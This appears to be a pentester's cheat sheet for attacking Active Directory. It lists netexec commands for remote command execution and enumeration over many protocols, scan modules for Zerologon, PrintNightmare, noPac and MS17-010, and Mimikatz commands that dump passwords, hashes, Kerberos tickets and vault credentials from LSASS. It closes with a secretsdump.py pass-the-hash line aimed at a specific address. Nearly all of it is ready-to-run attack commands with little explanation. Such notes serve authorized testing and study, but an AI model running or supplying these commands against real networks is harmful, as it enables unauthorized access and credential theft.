AD Tools
Netexec
# Protocole Enumeration
netexec rdp $ip -u 'user' -p 'pass' -x whoami
netexec wmi $ip -u 'user' -p 'pass' -x whoami
netexec smb $ip -u 'user' -p 'pass' -x whoami
netexec ldap $ip -u 'user' -p 'pass'
netexec ftp $ip -u 'user' -p 'pass'
netexec vnc $ip -u 'user' -p 'pass'
netexec winrm $ip -u 'user' -p 'pass' -x whoami
netexec ssh $ip -u 'user' -p 'pass' -x whoami
netexec nfs $ip -u 'user' -p 'pass'
netexec mssql $ip -u 'user' -p 'pass' -x whoami
# SMB Module
netexec smb $ip -u 'user' -p 'password'
netexec smb $ip -u 'user' -p 'password' --local-auth
netexec smb $ip -u 'user' -p 'password' --shares
netexec smb $ip -u 'guest' -p '' --rid-brute
# Vulnerabilities Scan : www.netexec.wiki/smb-protocol/scan-for-vulnerabilities
netexec smb $ip -u 'user' -p 'pass' -M zerologon
netexec smb $ip -u 'user' -p 'pass' -M printnightmare
netexec smb $ip -u 'user' -p 'pass' -M nopac
netexec smb $ip -u 'user' -p 'pass' -M smbghost
netexec smb $ip -u 'user' -p 'pass' -M ms17-010
netexec smb $ip -u 'user' -p 'pass' -M coerce_plusMimikatz
# Enable SeDebugPrivilege access right
privilege::debug
log
# Elevate to SYSTEM user privileges
token::elevate
# Extract Passwords/Hashes from the system
sekurlsa::logonpasswords
lsadump::sam
sekurlsa::tickets
sekurlsa::wdigest
# sekurlsa : Extracts passwords, keys, pin codes, tickets from the memory of LSASS
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::msv
sekurlsa::kerberos
# lsadump : Dump credential / secret / account data from LSA
lsadump::secrets
lsadump::cache
# vault : Dump Windows Credential Vault entries
vault::cred /patch
# Dumping Hashes remotely
secretsdump.py administrator@192.168.194.141 -hashes :3c4495bbd678fac8c9d218be4f2bbc7bLast updated